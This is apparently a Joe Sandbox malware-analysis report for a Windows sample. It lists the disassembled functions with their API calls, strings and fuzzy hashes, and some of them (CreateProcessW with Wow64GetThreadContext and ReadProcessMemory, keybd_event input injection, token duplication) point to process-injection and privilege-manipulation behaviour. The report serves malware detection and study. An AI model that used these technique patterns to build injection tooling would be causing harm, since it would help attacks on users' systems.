Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: eed4dff406e812007c6bc1740924f192584dfc2077a8033d8bc0a6ae2e282e21
Instruction ID: 81f75af14708e29438fdc243c3620496ff9fa9325f59fd6ed69da9897f683342
Opcode Fuzzy Hash: eed4dff406e812007c6bc1740924f192584dfc2077a8033d8bc0a6ae2e282e21
Instruction Fuzzy Hash: 90F09A72C49204BEDB21AF658A0376FBAA06F40331F25C208F420EB2C1CB7C8A419A95

Function 00C7509D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00C7585B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C758F1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C75913

Memory Dump Source

Source File: 00000000.00000002.1482114122.0000000000C73000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c73000_bIcqeSVPW6.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction ID: 9f95b207ff1668dc0d0b99d3b9c39381596c1975b95d64ebe753285023419367
Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction Fuzzy Hash: F312CE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 00A32957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00A32A0B

Part of subcall function 00A37C0E: __getptd_noexit.LIBCMT ref: 00A37C0E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: ba3f1edf7463cb976c47902ec3cb0d7a49a1a9dd4a47032a4ec1cb159bbd8365
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: 78417171B00706AFDF289FA9C9817AE7BB6AF853A0F24853DF855C7244EA70DD418B40

Function 00A2ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00A2EDC7

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: d599a5d04486db8c8d2af350940fee354c68ad203dfdaabfa3e568a1fbe75c98
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 7631F474A00115DBCB18DF1CE480A69FBB6FF49340B6486A5E40ACB366DB30EDC1CB90

Function 00A89A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00A89A80

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 7c20f36c3ed6dfa1d00d7e1402367f0db297bd85689b661beabf0207618f8616
Instruction ID: 791f2652dac86ec842991f75a1d14ebb5699537be172ba8193a7313a66d92fdd
Opcode Fuzzy Hash: 7c20f36c3ed6dfa1d00d7e1402367f0db297bd85689b661beabf0207618f8616
Instruction Fuzzy Hash: AA414C745046518FDB24DF18D484B1ABBF0BF45304F1989ACE99A4B362C372F886CF52

Function 00A141A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A14214: FreeLibrary.KERNEL32(00000000,?), ref: 00A14247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00A139FE,?,00000001), ref: 00A141DB

Part of subcall function 00A14291: FreeLibrary.KERNEL32(00000000), ref: 00A142C4

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 533e4e996030b4d7e3750592a04385c60c0469b50668ae50cb148ff200339bdc
Instruction ID: 14ba230cdfde4f379cbe7ca6fbef6701c988c1054b90d32497c26c2836ec3f38
Opcode Fuzzy Hash: 533e4e996030b4d7e3750592a04385c60c0469b50668ae50cb148ff200339bdc
Instruction Fuzzy Hash: BD119431600216AADB10FB68DE06BDE77A99F48700F10842DB596AA1C1DA74DA859B60

Function 00A89B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00A89B51

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 4dd08af72ef5e91e1e3616dafa7ae14d9d149aaff04a803786848f265fa2da30
Instruction ID: 6a7b9fb3178fad02a548414f05cd0da588dd71daa488223733eb7b563008b539
Opcode Fuzzy Hash: 4dd08af72ef5e91e1e3616dafa7ae14d9d149aaff04a803786848f265fa2da30
Instruction Fuzzy Hash: D92125B05086118FDB24DF68D584F2ABBF1BF88304F14496CE99A4B662C732E845CF52

Function 00A3AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00A3AFC0

Part of subcall function 00A37BDA: __getptd_noexit.LIBCMT ref: 00A37BDA

Part of subcall function 00A37C0E: __getptd_noexit.LIBCMT ref: 00A37C0E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: bde1e3d351c243cebe3c8faa82803a935278018222420d5b22be5bd31a27c7a5
Instruction ID: 2c683c1739405b6d37ddcef53e357104f529a48d0a769ebc8d5ef7a9eb4c05fb
Opcode Fuzzy Hash: bde1e3d351c243cebe3c8faa82803a935278018222420d5b22be5bd31a27c7a5
Instruction Fuzzy Hash: AB11C1B28156109FD726BFA8DA4276DBB62AF42331F264340F5751F1E2CBB48D008BB1

Function 00A139DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction ID: a77df72207a4d35dbcb3f5ef813c835c3893bb8564f9f257a0340f4c81f847f3
Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction Fuzzy Hash: E501A43240010DAFCF04EFA4C9928FEBF74EF25344F108029B522971A5EA309A89CF60

Function 00A32AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00A32AED

Part of subcall function 00A37C0E: __getptd_noexit.LIBCMT ref: 00A37C0E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 0440d651f4e1ba235f3eadc82283140866fe42c7bfb4c258f876f53861c885d6
Instruction ID: 8f797224af2ffc581701f9d9f1c48a6504a3a97a15f2108472abdbaf1a8e8354
Opcode Fuzzy Hash: 0440d651f4e1ba235f3eadc82283140866fe42c7bfb4c258f876f53861c885d6
Instruction Fuzzy Hash: BBF09031940205ABEF31AF75CE067DF7AA5BF00360F258415F4149B191D778CA52DB51

Function 00A14252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,00A139FE,?,00000001), ref: 00A14286

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 21e6f7b0574ba2b2ae9c291e55341caac324405bc067aac3c9d7ebb3436ad1f3
Instruction ID: b7dbffe3f70479b2b37edfe62e2c5c95182083f07050439841905a0ff7ec7a81
Opcode Fuzzy Hash: 21e6f7b0574ba2b2ae9c291e55341caac324405bc067aac3c9d7ebb3436ad1f3
Instruction Fuzzy Hash: 5BF015B1509712CFCB349F68D890896BBF4AF283263248A2EF5D682620C77298C0DB50

Function 00A140A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A140C6

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: e2d041a7758c8b58844af4a44dd28cfd664e34ee2c05d5cfe2ae6bb85e7b895c
Instruction ID: b398e90ecc77b6c3a9dd5ebbb6d655673d122b19cccafd434e837495ec16c23d
Opcode Fuzzy Hash: e2d041a7758c8b58844af4a44dd28cfd664e34ee2c05d5cfe2ae6bb85e7b895c
Instruction Fuzzy Hash: 81E0C237A002245BCB11E698CC46FEA77ADDF886A0F0901B6F909E7254DE64A9C18690

Function 00C7609C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00C760B1

Memory Dump Source

Source File: 00000000.00000002.1482114122.0000000000C73000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c73000_bIcqeSVPW6.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: ab4740583660ab9a23ec5245e967da2aa0d906d5bc91093302128bbecfd7a810
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 7AE0BF7494010EEFDB10EFA4D5496DE7BB4EF04301F1045A1FD05D7680DB319E548A66

Function 00C760A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00C760B1

Memory Dump Source

Source File: 00000000.00000002.1482114122.0000000000C73000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c73000_bIcqeSVPW6.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 7c18aaff6aed6cf08d01545a35234589a28a47284b0bd356738ecf37986bc33f
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 53E0E67494010EDFDB00EFB4D5496DE7FB4EF04301F104161FD05D2280D6319D508A62

Non-executed Functions

Function 00A7F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A2B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00A7F87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A7F8DC
GetWindowLongW.USER32(?,000000F0), ref: 00A7F919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A7F940
SendMessageW.USER32 ref: 00A7F966
_wcsncpy.LIBCMT ref: 00A7F9D2
GetKeyState.USER32(00000011), ref: 00A7F9F3
GetKeyState.USER32(00000009), ref: 00A7FA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A7FA16
GetKeyState.USER32(00000010), ref: 00A7FA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A7FA4F
SendMessageW.USER32 ref: 00A7FA72
SendMessageW.USER32(?,00001030,?,00A7E059), ref: 00A7FB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00A7FB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A7FB96
SetCapture.USER32(?), ref: 00A7FB9F
ClientToScreen.USER32(?,?), ref: 00A7FC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A7FC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00A7FC29
ReleaseCapture.USER32 ref: 00A7FC34
GetCursorPos.USER32(?), ref: 00A7FC69
ScreenToClient.USER32(?,?), ref: 00A7FC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A7FCD8
SendMessageW.USER32 ref: 00A7FD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A7FD41
SendMessageW.USER32 ref: 00A7FD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A7FD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A7FD8F
GetCursorPos.USER32(?), ref: 00A7FDB0
ScreenToClient.USER32(?,?), ref: 00A7FDBD
GetParent.USER32(?), ref: 00A7FDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A7FE3F
SendMessageW.USER32 ref: 00A7FE6F
ClientToScreen.USER32(?,?), ref: 00A7FEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A7FEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A7FF19
SendMessageW.USER32 ref: 00A7FF3C
ClientToScreen.USER32(?,?), ref: 00A7FF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A7FFB6
GetWindowLongW.USER32(?,000000F0), ref: 00A8004B

Strings

@GUI_DRAGID, xrefs: 00A7FBCC
F, xrefs: 00A7FF42

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: fe0a72c97b8a667a7f7020dedcbec011618ca1a265e504b8119ad0be4dd4b54c
Instruction ID: 6766e0c3781a6d4f471bb784de45feb8f57b9867a5e5c66d09d1e228019ec9c8
Opcode Fuzzy Hash: fe0a72c97b8a667a7f7020dedcbec011618ca1a265e504b8119ad0be4dd4b54c
Instruction Fuzzy Hash: 6D32B070604345AFDB10CFA8CC84BAABBB5FF48354F14862AF659872A1D731DE45CB62

Function 00A7AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00A7B1CD

Strings

%d/%02d/%02d, xrefs: 00A7AEFC

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: a556fb819210ac524b6ba92581cf7a1538e6f3e1d086b728928c734734705362
Instruction ID: 2d3b3f740164fa485323acfdcbbbcf11cbeb53be3b1ab863387b12bc4b6e73d1
Opcode Fuzzy Hash: a556fb819210ac524b6ba92581cf7a1538e6f3e1d086b728928c734734705362
Instruction Fuzzy Hash: 3D12E3B1610218ABEB259F64DD59FAE7BB4FF85310F10C22AF919DB1D1DB708942CB21

Function 00A2EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 00A2EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A83AEA
IsIconic.USER32(000000FF), ref: 00A83AF3
ShowWindow.USER32(000000FF,00000009), ref: 00A83B00
SetForegroundWindow.USER32(000000FF), ref: 00A83B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A83B20
GetCurrentThreadId.KERNEL32 ref: 00A83B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00A83B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00A83B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00A83B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00A83B54
SetForegroundWindow.USER32(000000FF), ref: 00A83B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A83B6C
keybd_event.USER32(00000012,00000000), ref: 00A83B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A83B81
keybd_event.USER32(00000012,00000000), ref: 00A83B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A83B8F
keybd_event.USER32(00000012,00000000), ref: 00A83B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A83B9E
keybd_event.USER32(00000012,00000000), ref: 00A83BA3
SetForegroundWindow.USER32(000000FF), ref: 00A83BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00A83BCD

Strings

Shell_TrayWnd, xrefs: 00A83AE5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 3154a55da2a26293a98dfa94498dd56f6b39eae795ceaa3afa3d8f2e6db08d13
Instruction ID: 88a82c34fb0e84556ff7fa88523b6ce61d009ff7588ad385ac8e73e67b62ce9a
Opcode Fuzzy Hash: 3154a55da2a26293a98dfa94498dd56f6b39eae795ceaa3afa3d8f2e6db08d13
Instruction Fuzzy Hash: 8E3174B2B403187BEF20ABB59C49F7F7E6CEB44B50F114016FA05EA1D0DAB15D41ABA0

Function 00A4ACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 00A4B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A4B180
Part of subcall function 00A4B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A4B1AD
Part of subcall function 00A4B134: GetLastError.KERNEL32 ref: 00A4B1BA

_memset.LIBCMT ref: 00A4AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00A4AD5A
CloseHandle.KERNEL32(?), ref: 00A4AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A4AD82
GetProcessWindowStation.USER32 ref: 00A4AD9B
SetProcessWindowStation.USER32(00000000), ref: 00A4ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A4ADBF

Part of subcall function 00A4AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A4ACC0), ref: 00A4AB99
Part of subcall function 00A4AB84: CloseHandle.KERNEL32(?,?,00A4ACC0), ref: 00A4ABAB

Strings

, xrefs: 00A4AD17
default, xrefs: 00A4ADBA
winsta0, xrefs: 00A4AD7D

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 09251acc711891ad03cc6345976b467b5195ab2435a5a066044240ed0570c8cb
